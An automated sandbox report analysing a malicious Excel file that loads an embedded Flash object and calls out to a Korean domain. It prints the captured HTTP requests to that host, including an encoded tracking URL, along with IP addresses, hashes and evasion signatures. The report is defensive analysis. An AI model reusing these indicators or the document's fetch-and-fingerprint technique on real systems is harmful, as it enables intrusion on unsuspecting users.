Joe Sandbox Cloud Basic Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:44908
Start time:19:02:57
Joe Sandbox Product:CloudBasic
Start date:03.02.2018
Overall analysis duration:0h 4m 20s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:a.xlsx
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1)
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Detection:MAL
Classification:mal64.evad.expl.winXLSX@1/7@2/2
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information:Failed
HDC Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xlsx
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 60
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, dllhost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: EXCEL.EXE


Detection

StrategyScoreRangeReportingDetection
Threshold640 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for domain / URLShow sources
Source: www.dylboiler.co.krvirustotal: Detection: 4%Perma Link
Antivirus detection for submitted fileShow sources
Source: a.xlsxvirustotal: Detection: 22%Perma Link

Exploits:

barindex
Microsof Office program loads Macromedia Flash PlayerShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\system32\Macromed\Flash\Flash32_16_0_0_235.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\system32\Macromed\Flash\Flash32_16_0_0_235.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\system32\Macromed\Flash\Flash32_16_0_0_235.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\system32\Macromed\Flash\Flash32_16_0_0_235.ocx

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: EXCEL.EXEBinary or memory string: DirectInput8Create
Installs a global mouse hookShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEWindows user hook set: 0 mouse low level C:\Windows\system32\DINPUT8.dll

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: www.dylboiler.co.kr
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.3:49172 -> 114.108.131.63:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.3:49172 -> 114.108.131.63:80

Networking:

barindex
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4A0E0FA.emf
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /crossdomain.xml HTTP/1.1Accept: */*Accept-Language: en-USx-flash-version: 16,0,0,235Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.dylboiler.co.krConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F544858D11A14D6EC48493805834A643609AAAF57E793AB7C6C6840BEDDA9FF3F6A17B26861193875A25F903453C53309D47AA736F561515967B78B3671F7F6B7E4FA113151630BE9793AD6D705D77DAA7802B70C&fp_vs=WIN%2016.0,0,235&os_vs=Windows%207 HTTP/1.1Accept: */*Accept-Language: en-USx-flash-version: 16,0,0,235Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.dylboiler.co.krConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.dylboiler.co.kr
Urls found in memory or binary dataShow sources
Source: EXCEL.EXEString found in binary or memory: HTTP://
Source: EXCEL.EXEString found in binary or memory: HTTPS://
Source: EXCEL.EXEString found in binary or memory: HTTPS://HTTP://o
Source: EXCEL.EXEString found in binary or memory: file://
Source: EXCEL.EXEString found in binary or memory: file:///
Source: EXCEL.EXEString found in binary or memory: file:////
Source: EXCEL.EXEString found in binary or memory: file:////#?
Source: EXCEL.EXEString found in binary or memory: file:///C:
Source: EXCEL.EXEString found in binary or memory: file:///local
Source: EXCEL.EXEString found in binary or memory: file:///localWithNet
Source: EXCEL.EXEString found in binary or memory: file:///localWithNetfile:///localfile://dummyCould
Source: EXCEL.EXEString found in binary or memory: file://pdfmediahttpCookie:URLStreamReadThreadc
Source: EXCEL.EXEString found in binary or memory: ftp://
Source: EXCEL.EXEString found in binary or memory: ftp://pt-PTpt-BRes-ES
Source: EXCEL.EXEString found in binary or memory: http://
Source: EXCEL.EXEString found in binary or memory: http://%s
Source: EXCEL.EXEString found in binary or memory: http://%s/
Source: EXCEL.EXEString found in binary or memory: http://%shttp://a.SharedObject.BadPersistenceSharedObject.UriMismatchpendingReserved
Source: EXCEL.EXEString found in binary or memory: http://a.
Source: EXCEL.EXEString found in binary or memory: http://fpdownload2.macromedia.com/get/
Source: EXCEL.EXEString found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/express/version_win_
Source: EXCEL.EXEString found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_
Source: EXCEL.EXEString found in binary or memory: http://fpdownload2.macromedia.com/get/flashplayer/update/current/xml/version_x
Source: EXCEL.EXEString found in binary or memory: http://fpdownload2.macromedia.com/get/https://fpdownload.macromedia.com/get/https://www.macromedia.c
Source: EXCEL.EXEString found in binary or memory: http://https://ftp://file://file:///%02XabczdhcheckPolicyFileexactFitfailed
Source: EXCEL.EXEString found in binary or memory: http://localhost:8080/axis/services/urn:EDCLicenseService
Source: EXCEL.EXEString found in binary or memory: http://purl.o
Source: EXCEL.EXEString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: EXCEL.EXEString found in binary or memory: http://www.
Source: EXCEL.EXE, activeX1.binString found in binary or memory: http://www.dylboiler.co.kr/admincenter/files/boad/4/manager.php
Source: EXCEL.EXEString found in binary or memory: http://www.dylboiler.co.kr/admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F5
Source: EXCEL.EXEString found in binary or memory: http://www.macromedia.com
Source: EXCEL.EXEString found in binary or memory: http://www.macromedia.com/go/player_settings_
Source: EXCEL.EXEString found in binary or memory: http://www.macromedia.com/go/player_settings_.Unmuted.MutedCamera.UnmutedCamera.MutedMicrophone.Unmu
Source: EXCEL.EXE, crossdomain[1].xml.2.drString found in binary or memory: http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd
Source: EXCEL.EXEString found in binary or memory: http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&amp
Source: EXCEL.EXEString found in binary or memory: http://www.openssl.org/support/faq.html
Source: EXCEL.EXEString found in binary or memory: http://www.openssl.org/support/faq.html.....................
Source: EXCEL.EXEString found in binary or memory: https://
Source: EXCEL.EXEString found in binary or memory: https://auth.adobefpl.com/1/
Source: EXCEL.EXEString found in binary or memory: https://fpdownload.macromedia.com/get/
Source: EXCEL.EXEString found in binary or memory: https://www.macromedia.com/bin/flashdownload.cgi
Source: EXCEL.EXEString found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /crossdomain.xml HTTP/1.1Accept: */*Accept-Language: en-USx-flash-version: 16,0,0,235Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.dylboiler.co.krConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F544858D11A14D6EC48493805834A643609AAAF57E793AB7C6C6840BEDDA9FF3F6A17B26861193875A25F903453C53309D47AA736F561515967B78B3671F7F6B7E4FA113151630BE9793AD6D705D77DAA7802B70C&fp_vs=WIN%2016.0,0,235&os_vs=Windows%207 HTTP/1.1Accept: */*Accept-Language: en-USx-flash-version: 16,0,0,235Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.dylboiler.co.krConnection: Keep-Alive

System Summary:

barindex
Checks whether correct version of .NET is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbolsShow sources
Source: Binary string: Flash.pdb source: EXCEL.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb source: EXCEL.EXE
Source: Binary string: G:\o14sp1\65_VC8\VBE6\legovbe\vbe7.pdb> source: EXCEL.EXE
Binary contains paths to development resourcesShow sources
Source: EXCEL.EXEBinary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification labelShow sources
Source: classification engineClassification label: mal64.evad.expl.winXLSX@1/7@2/2
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Excel
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\SAMTAR~1\AppData\Local\Temp\CVRE54F.tmp
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: a.xlsxVirustotal: hash found
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Stores large binary data to the registryShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey value created or modified: HKEY_USERS\Software\Microsoft\Office\14.0\Excel FontInfoCache
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXENetwork Connect: 114.108.131.63 80

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 44908 Sample: a.xlsx Startdate: 03/02/2018 Architecture: WINDOWS Score: 64 13 www.dylboiler.co.kr 2->13 19 Antivirus detection for domain / URL 2->19 21 Antivirus detection for submitted file 2->21 6 EXCEL.EXE 58 49 2->6         started        signatures3 process4 dnsIp5 15 www.dylboiler.co.kr 114.108.131.63, 49172, 49173, 80 LGDACOMLGDACOMCorporationKR Korea Republic of 6->15 17 8.8.8.8, 53, 63758 GOOGLE-GoogleIncUS United States 6->17 11 C:\Users\user\Desktop\~$a.xlsx, data 6->11 dropped 23 System process connects to network (likely due to code injection or exploit) 6->23 25 Microsof Office program loads Macromedia Flash Player 6->25 file6 signatures7

Simulations

Behavior and APIs

TimeTypeDescription
19:03:29API Interceptor2x Sleep call for process: EXCEL.EXE modified from: 30000ms to: 100ms
19:03:29API Interceptor657x Sleep call for process: EXCEL.EXE modified from: 60000ms to: 100ms

Antivirus Detection

Initial Sample

SourceDetectionCloudLink
a.xlsx22%virustotalBrowse

Dropped Files

No Antivirus matches

Domains

SourceDetectionCloudLink
www.dylboiler.co.kr4%virustotalBrowse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
LGDACOMLGDACOMCorporationKR31youtubeer@youtube.exeecb0852024820c4b3426c5e10570e9397e887a959d1a5827578a07200f51afffmaliciousBrowse
  • 211.169.146.91
winupdate.exe2161c4f303c9b5f38a58fa1dedf3f70329c6009a273d6be0a2b4a945f2114b02maliciousBrowse
  • 110.45.144.153
Lx9gbXEjct.exed750ac2061df6fd607d901ad918e9e1f0693e044e399c863d8d09eb0c866100amaliciousBrowse
  • 211.234.63.232
44PI-7993INV#-2017.exe1356d7bc326b6b2837a6a3fd6a740487d8493cf7336275567bbf7be5be541505maliciousBrowse
  • 211.234.63.232
rinnai.co.krmaliciousBrowse
  • 58.72.180.22
7#U7eJQOO5OUO54VOC737089BY30.js1ce0ee9bd5ba5662d8d18b2e43c2a98a790bcd541fd56ec85c3be7db1e0636f0maliciousBrowse
  • 211.40.221.67
7#U7eJQOO5OUO54VOC737089BY30.js1ce0ee9bd5ba5662d8d18b2e43c2a98a790bcd541fd56ec85c3be7db1e0636f0maliciousBrowse
  • 211.40.221.67
19QUOTATION.exe1d8730fb8718b3e9765cf8146c71da54d853fc5da73065a7bfd3509ec8ec261bmaliciousBrowse
  • 211.234.63.232
LWop1cXK0.exe33da905c31916f6c8f457eba354991f2018e7d7c888f160843b42a229aa078c0maliciousBrowse
  • 114.108.160.134

Dropped Files

No context

Screenshot

windows-stand

Startup

  • System is w7
  • EXCEL.EXE (PID: 3584 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde MD5: 716335EDBB91DA84FC102425BFDA957E)
  • cleanup

Created / dropped Files

C:\Users\SAMTAR~1\AppData\Local\Temp\Excel8.0\ShockwaveFlashObjects.exd
File Type:data
Size (bytes):21924
Entropy (8bit):4.478695190024331
Encrypted:false
MD5:8C56941EA80A352B16BD341E2046A970
SHA1:98D20CEC9D7B5DA66240C3F395037EA3C5C5B577
SHA-256:57AA3EFA4FC50266B2EA550F1343CCAA752C0C2DA47B027AC4BD7067EA60BF9B
SHA-512:DAF052F898D70886DABA4B5103AEB7DC5022C463AE6CE6916BE6CCBE59AC1BA5E2E6786EEA57237E4F899D9B769DD7867CDA58484E28E9BCC81D3B248B6CC6C9
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\E2PG59KZ\crossdomain[1].xml
File Type:XML document text
Size (bytes):342
Entropy (8bit):4.9086478647208605
Encrypted:false
MD5:D57E6FC37DE0EB06DF4AA8A77231B2E5
SHA1:57EAC9A330F041B0716186941A15E572F42D8EED
SHA-256:16BC92C38028721B6AFF0852158ECFBB66852D2F5F79380A5152E5F25AD30C2E
SHA-512:C763166C6FBB088A608181B81C03DA9E4AF9C1D7E7633FA72DC906B5053BF172C54613E71F1A48087299A0DA70371E6200BFAC1D50E3942EBE9C4DBBDD335BAF
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4A0E0FA.emf
File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
Size (bytes):940
Entropy (8bit):2.2633111018826657
Encrypted:false
MD5:6D52F5DA335385F403FA9E08F25A8B27
SHA1:1CF4F6C52EE4DBDADC6D899CD0A54A2BB4DF4424
SHA-256:FD7BBC4846622C73726859C1690532062089F281DC861D9E26F1AD32EA0DF6A7
SHA-512:CC59A1EBAFCC069113FBCDAEC1F3FA4DD4C3EDFD105F22C154470E0B3065EBDB2A4818FE181F06CDE6CBB790260CD4DA1CEA5D6DCA688621B65F166F39A0CED6
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx
File Type:data
Size (bytes):6400
Entropy (8bit):4.657281124034824
Encrypted:false
MD5:921E48048FCC60ED8C239FD98EA2FC01
SHA1:AFEE82E25F73489BE3BF968E3C003981B8011038
SHA-256:1F393B9330DB706BE919A1DE20FBC757A4B112C2621E9DCD9AE6118665E29AAC
SHA-512:FE07FE875C4BAAE088DE733CA3B9E72809FB0B3C54ABD03D65473602C6DB7B68F818D128A27EB91681B75E062C9F2859A85980820E8655CC3D137678D4E9372E
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\a.LNK
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Sep 24 14:02:10 2017, mtime=Sun Sep 24 14:02:10 2017, atime=Sat Feb 3 18:03:23 2018, length=126305, window=hide
Size (bytes):1988
Entropy (8bit):4.524838333572448
Encrypted:false
MD5:CE00AB1D185042B391947DB2E00A82FD
SHA1:25944F91A1088FA08FDB6D91360555CB270F5FB5
SHA-256:AEA8F91174753642F1493C8C798CF0B14C03E65687CAF082237ECF12BF4B5225
SHA-512:10F2154CEF3A86E4C967EAB7BFF5ECE533B5BB88FD6EFC2239384D8FAD3274A023E52C793D975483DF8EED61242E8DFACBDB8CDF2470CCBF723AC114630FBB59
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type:ASCII text, with CRLF line terminators
Size (bytes):43
Entropy (8bit):3.83316025553889
Encrypted:false
MD5:5753A3F78C5A08A75A0011D513968E4E
SHA1:4AC1A925251C9ECA83DB5FFBCA94B9A63C00E02A
SHA-256:06FF635C0568C53B0037C9F1AEF47F52E3F35C248945F58C93085E995AE82BA0
SHA-512:E5165765DF43A3539A7835B500905CB764C4E982693BB3A36E54E1FCB1E6041879FD5080FDB8CB0D86A43083DF21BC14758CD916E44B686EDDBA171C53D2CA38
Malicious:false
Reputation:low
C:\Users\user\Desktop\~$a.xlsx
File Type:data
Size (bytes):165
Entropy (8bit):1.8123539313128556
Encrypted:false
MD5:5D1C23E469CB1A62CFEFAF0D295D25B9
SHA1:B542C97B9B9A5218AB7B362B565C387AB02454AD
SHA-256:4A585BEF8FCF913E857F2B0AD28B665DD2329521901E23BF8527FD8F3BA13D15
SHA-512:C8413843B39C086093DF545BF50FEF8C7200799D41E2D1A4C789C13A1C2277EFD85A7125EDDECCDA46219EAAFAEC17805553CDF3FDB02A6186B7B3D43AEBB3A9
Malicious:true
Reputation:moderate, very likely benign file

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus Detection
www.dylboiler.co.kr114.108.131.63truetrue4%, virustotal, Browse

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
8.8.8.8United States
15169GOOGLE-GoogleIncUSfalse
114.108.131.63Korea Republic of
3786LGDACOMLGDACOMCorporationKRtrue

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.961208356093016
TrID:
  • Excel Microsoft Office Open XML Format document (50504/1) 92.65%
  • ZIP compressed archive (4004/1) 7.35%
File name:a.xlsx
File size:126305
MD5:5f97c5ea28c0401abc093069a50aa1f8
SHA1:15053a986dc12c9f353f4940d7d918871d337aed
SHA256:14c58e3894258c54e12d52d0fba0aafa258222ce9223a1fdc8a946fd169d8a12
SHA512:94f5d406e822a9b9ff330d8046e56a8f76a24ba6745fd90e67458c7dea94363fe0900c1db5db87d1ee9d15ddfc8549d990cf791597ec57ebc59a200ffc3e14c3
File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Feb 3, 2018 19:03:45.458077908 CET6375853192.168.2.38.8.8.8
Feb 3, 2018 19:03:46.480983019 CET6375853192.168.2.38.8.8.8
Feb 3, 2018 19:03:47.413377047 CET53637588.8.8.8192.168.2.3
Feb 3, 2018 19:03:47.413408995 CET53637588.8.8.8192.168.2.3
Feb 3, 2018 19:03:47.467498064 CET4917280192.168.2.3114.108.131.63
Feb 3, 2018 19:03:47.467519999 CET8049172114.108.131.63192.168.2.3
Feb 3, 2018 19:03:47.467619896 CET4917280192.168.2.3114.108.131.63
Feb 3, 2018 19:03:47.468636990 CET4917280192.168.2.3114.108.131.63
Feb 3, 2018 19:03:47.468648911 CET8049172114.108.131.63192.168.2.3
Feb 3, 2018 19:03:48.668015957 CET8049172114.108.131.63192.168.2.3
Feb 3, 2018 19:03:48.668052912 CET8049172114.108.131.63192.168.2.3
Feb 3, 2018 19:03:48.668133974 CET4917280192.168.2.3114.108.131.63
Feb 3, 2018 19:03:48.668344975 CET4917280192.168.2.3114.108.131.63
Feb 3, 2018 19:03:48.668359995 CET8049172114.108.131.63192.168.2.3
Feb 3, 2018 19:03:48.710907936 CET4917380192.168.2.3114.108.131.63
Feb 3, 2018 19:03:48.710928917 CET8049173114.108.131.63192.168.2.3
Feb 3, 2018 19:03:48.710992098 CET4917380192.168.2.3114.108.131.63
Feb 3, 2018 19:03:48.711327076 CET4917380192.168.2.3114.108.131.63
